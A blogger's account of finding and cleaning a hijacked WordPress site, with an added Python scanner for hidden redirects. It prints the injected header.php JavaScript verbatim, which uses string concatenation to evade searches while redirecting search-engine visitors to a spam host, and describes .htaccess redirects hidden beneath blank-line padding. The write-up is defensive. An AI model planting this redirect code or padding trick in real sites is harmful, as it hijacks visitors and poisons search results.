WordPress Was Hijacked!

So, I opened up endlick.com and hoped to see some new content – ignoring the fact that I’m the only one who posts here and I sure as hell haven’t been vigilant about it – and saw some ad for insurance. endlick.com is a site where I post shitty content about computer issues and bawdy tales of lust, not a site that advertises insurance plans.

My initial reaction after finding out that my blog was hijacked

Something was amiss! I put on my sleuthing hat and novelty pipe and set out to solve “The Mystery of the Shitty Website That Was Completely Fucked”.

Now, when it comes to troubleshooting, you want to determine the scope of the problem, and then isolate the issue. I didn’t follow this route because I assumed that this issue arose from me recently transferring a domain from GoDaddy to Namecheap. That domain was used for a few nameservers.
I figured that the nameservers were pointing to the incorrect place, so I started by investigating that.

My process was:
1) Visited the site on multiple devices (different networks) and via different browsers.
2) Checked other sites hosted with the same hosting company to determine which ones were affected.
3) Set the correct IP address to endlick.com in my hosts file and attempted to access the site.
4) Confirmed that the DNS was pointing to the correct place with Windows tracert.

At this point, I sat back confused. I had incorrectly assumed that it was a DNS issue, and effectively ruled it out. This is where things got interesting.
I checked what logs I could find in the hosting company’s admin panel and found that the site had no hits since August 4th. I transferred the domain around August 18th. I also didn’t realize that the site had been hijacked for more than 2 weeks.

lol.

5) This site runs WordPress, which is up to date. I checked for reported vulnerabilities in WordPress and found none.
6) In the WordPress database, I changed the template, stylesheet, current_theme columns to a different value to determine if the theme was responsible.
7) Deleted the contents in the active_plugins column to rule out plugins as the cause.
8) I commented out everything in WordPress’ index.php file to see if it would resolve the issue.
9) I created an index.html file to see if it would be accessed.

So, WordPress was not causing the issue. It wasn’t a DNS issue. It was a webserver issue. The final step was to figure out where the webserver settings were being changed.
This site is on a shared server, so if the webserver’s config had been compromised, a whole lot of sites would have been affected. I correctly assumed that it was running Apache, and looked for an .htaccess file. I didn’t see one. In fact, I didn’t see any dotfiles, since I was using some web admin panel which hid them.
I tried to set up ssh access, which I thought I was paying for but apparently am not. I tried to create an .htaccess file and got the error message “ERROR: Could not create file “.htaccess” in /home/myusername/public_html: File exists”

So, I poked around a bit more and found that the dotfiles could be displayed. The contents of .htaccess were just a redirect.

Jackpot.

I updated the .htaccess file, and my site was once again appearing.

I am thinking that some outdated Flash plugin to display pictures was the attack vector. Also, I probably had .htaccess set with stupid 777 permissions since I most likely was drunk when I set this site up several years ago.
I disabled most of the WordPress plugins, and hope that the problem is now solved.


EDIT: 2017-03-29 Oh no, but it wasn’t solved! Google has a nice service to send you an email to let you know if your site may be hijacked, and occasionally scans to make sure things are legit. After poring through the server-side files, I found a bunch of .htaccess files stashed away that appear to be only a few lines. On closer inspection, they are a few lines, followed by about 50 blank lines, then a bunch of redirects at the bottom. Each file was about 9 kilobytes in size.
I think those are all cleared out, but I’ve lost the coveted first place in Google when you search for “endlick”. I wasn’t getting much traffic anyways, but y’know, it’s a pride thing to say “Yeah, go onto Google and search for endlick and you’ll see my site”

EDIT: 2017-04-22 So, Google goes and declines a request that I put in to remove that “this site may be hacked” message from their listings, saying that the site still redirects on mobile. I’m thinking “nuh uh, I checked that, and it was .htaccess stuff”, completely incredulous and upset that it took them 2 weeks to reevaluate the site. However, they linked to a very useful case study that hinted at code being hidden in WordPress php files.
Welp, sure enough, there was a big chunk of JS in the “header.php” file. That redirects search engines to the spammy sites. Take a look at this code that was used, and note how it does string concatenation inside the JS function to… lol, I don’t know. Avoid greps for “script” and “document”? Line breaks were added by me because I’m too lazy to edit the styles to fix it correctly because I want to wash my hands of all of this.


<script type="text/javascript">
function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1
||Ref.indexOf('.bing.')!=-1
||Ref.indexOf('.yahoo.')!=-1
||Ref.indexOf('.aol.')!=-1
||Ref.indexOf('.ask.')!=-1
||Ref.indexOf('.altavista.')!=-1
||Ref.indexOf('.yandex.')!=-1){document.write(
'<script language="javascript">docu'+'ment.location="http://portal-b.pw/XcTyTp"</s'+'cript>')}else{document.write('.')}}R();
</script>
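The two hiding tricks from the March and April edits (redirects parked below ~50 blank lines in .htaccess, and a redirect split with 'docu'+'ment' string concatenation in header.php) are both things a script can look for. The scanner below is an added example, not the author's code and not anything pulled from the hacked site: the sample .htaccess and header.php texts are constructed to match the shapes described above, and the spam.example host is a placeholder. It joins adjacent quoted pieces before searching, so the indicator shows up even when a plain grep for it would not, and it flags any .htaccess where redirect directives sit below a long run of blank lines.

```python
"""Added example (not the author's or WordPress's code): scan a WordPress tree for
(1) .htaccess files whose redirect directives hide below blank-line padding and
(2) PHP/JS files whose redirect is split with JS string concatenation so that a
grep for the joined word ('document.location') misses it.
Sample inputs at the bottom are constructed; spam.example is a placeholder host."""
import os
import re
from typing import Dict, List

# Two adjacent single-quoted JS literals joined by '+': 'docu'+'ment' -> 'document'.
_CONCAT_RE = re.compile(r"'([^'\\]*)'\s*\+\s*'([^'\\]*)'")

# Strings a theme's header.php normally has no business containing.
INDICATORS = ("document.location", "window.location", "document.referrer",
              "document.write(", "eval(", "base64_decode(")

# Apache directives that decide whether and where a visitor gets sent elsewhere.
_DIRECTIVE_RE = re.compile(r"^\s*(Redirect\w*|Rewrite(?:Cond|Rule))\s", re.I)

BLANK_RUN_THRESHOLD = 20  # the post describes roughly 50 blank lines of padding


def deconcatenate(src: str) -> str:
    """Join 'a'+'b' into 'ab', repeating until the text stops changing."""
    while True:
        joined = _CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        if joined == src:
            return joined
        src = joined


def scan_php(src: str) -> Dict[str, List[str]]:
    """Indicators present in the raw text, in the de-concatenated text, and the
    difference: whatever only appears after joining was deliberately split."""
    raw = [i for i in INDICATORS if i in src]
    normalized = [i for i in INDICATORS if i in deconcatenate(src)]
    return {"raw": raw, "normalized": normalized,
            "hidden": [i for i in normalized if i not in raw]}


def scan_htaccess(src: str) -> Dict[str, object]:
    """Flag redirect directives that sit below a long run of blank lines."""
    longest_run = run = 0
    below_padding = False
    padded: List[str] = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if not line.strip():
            run += 1
            longest_run = max(longest_run, run)
            if run >= BLANK_RUN_THRESHOLD:
                below_padding = True
            continue
        run = 0
        if below_padding and _DIRECTIVE_RE.match(line):
            padded.append(f"line {lineno}: {line.strip()}")
    return {"longest_blank_run": longest_run, "padded_directives": padded,
            "suspicious": bool(padded)}


def scan_tree(root: str) -> Dict[str, Dict]:
    """Walk an install and apply both checks. os.walk sees the dotfiles that a
    hosting panel's file manager hides, and .htaccess can live in any directory."""
    findings: Dict[str, Dict] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            if name == ".htaccess":
                result = scan_htaccess(src)
                if result["suspicious"]:
                    findings[path] = result
            elif name.endswith((".php", ".js")):
                result = scan_php(src)
                if result["normalized"]:
                    findings[path] = result
    return findings


# Constructed sample: three innocuous lines, 50 blank lines, then the redirects.
SAMPLE_HTACCESS = (
    "# BEGIN WordPress\nRewriteEngine On\nRewriteBase /\n"
    + "\n" * 50
    + "RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\\. [NC]\n"
    + "RewriteRule ^(.*)$ http://spam.example/landing [R=302,L]\n"
)

# Constructed sample of the header.php injection, same shape as the snippet above.
SAMPLE_HEADER_PHP = (
    "<?php wp_head(); ?>\n<script type=\"text/javascript\">\n"
    "function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1){"
    "document.write('<script language=\"javascript\">docu'+'ment.location="
    "\"http://spam.example/r\"</s'+'cript>')}else{document.write('.')}}R();\n"
    "</script>\n"
)

if __name__ == "__main__":
    print(scan_php(SAMPLE_HEADER_PHP))
    print(scan_htaccess(SAMPLE_HTACCESS))
    # scan_tree("/home/myusername/public_html")  # point at a real install
```

Against the constructed header.php, `document.referrer` and `document.write(` are visible in the raw text but `document.location` only appears in the "hidden" list after joining, which is exactly the word a grep would have been run for. The .htaccess check reports the RewriteCond and RewriteRule lines together with their line numbers, so the trigger (referrer, user agent) and the target are both in the finding.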

Now it’s time for a resubmission and maybe this issue will be fixed.
